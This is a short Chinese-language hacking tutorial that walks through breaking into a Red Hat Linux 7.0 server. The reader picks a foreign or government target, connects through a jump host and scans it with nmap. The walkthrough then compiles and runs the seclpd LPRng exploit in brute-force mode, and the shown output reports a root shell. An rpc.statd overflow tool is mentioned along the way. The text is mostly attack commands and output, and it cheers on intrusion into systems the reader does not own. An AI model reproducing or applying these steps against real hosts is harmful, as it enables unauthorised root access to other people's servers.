步步入侵REDHAT LINUX7.0

WINDOWS2000、NT是不是不想“玩”了，快跟我一步步入侵REDHAT LINUX7.0吧!
[一. 确定目标]
  日本?台湾?美国?随便你了!
[二.试试他的服务都有些什么]
  比如TELNET 或是 FTP等等,你会得到一些系统信息的!
[三.找跳板]
  当然也是REDHAT LINUX7.0的了,最好是你自已的,方便嘛!
  命令行:
  C:\>telnet xxx.xxx.xxx.xxx
  登陆上去了吧!
[四.用扫描器看看]
  这里我们推荐使用NMAP,因为在UNIX系统中它够爽,输入以下命令:
  bash-2.04$(这是系统提示状态) nmap -sT -0 www.xxx.gov(你先前选定的目标)
  是不是开了很多端口呀
[五.利用LP(网络打印服务)漏洞入侵]
  重点来了!在REDHAT 7.0中有个LP漏洞(其实我们通过上面的扫描结果后也可以试试
RPC漏洞 例如:bash-2.04$ finger @www.xxx.gov 查看用户
      bash-2.04$ ./statdx -h 其中statd为rpc.ststd是一个程式需下载
      查看系统支持版本
      bash-2.04$ stat -d 0 www.xxx.gov 进行溢出)
  呵呵,跑题了!
  我们需要下载一个SECLPD.C程序,然后将这个程序上传到你的跳板上
  用GCC编译一下,输入命令
  bash-2.04$ gcc -o seclpd seclpd.c
  编译成功后,执行看看命令的使用:
  bash-2.04$ ./seclpd
  看来就是它了,没有错.开始入侵
  输入命令
  bash-2.04$ ./seclpd www.xxx.gov -t 0
  结果显示失败,在来
  bash-2.04$ ./seclpd www.xxx.gov -t 1
  又失败,我在来
  bash-2.04$ ./seclpd www.xxx.gov brute -t 0 我加BRUTE,暴力,哈哈~
  结果不在显示TRY BRUTE FORCE了,是一直想要的RELAX AND ENJOY THE RIDE;>
  现在要等它看出不出SHELL,大约五分钟左右,就会有结果出来
  - [+] shell located on www.xxx.gov
  - [+] enter commands at will
  linux xxx.www 2.2.16-22smp #1 smp tue aug 22 17:34:21 edt 2002 i686
  unknown
  uid=(0)(root) gid=7(lp)
  我笑,我大声地笑,我是ROOT了!
  哈哈哈哈哈.......
  (你有病呀,还不来吃饭,晕,老妈叫了,各位你们慢慢爽吧,别忘了将结果通知我呀)

-------------------- 一个人的尊严和人格是绝对神圣而不可侵犯的。
如若有歹人敢亵渎之，则必以天赋之自卫权利以应之！   -----【精武英雄】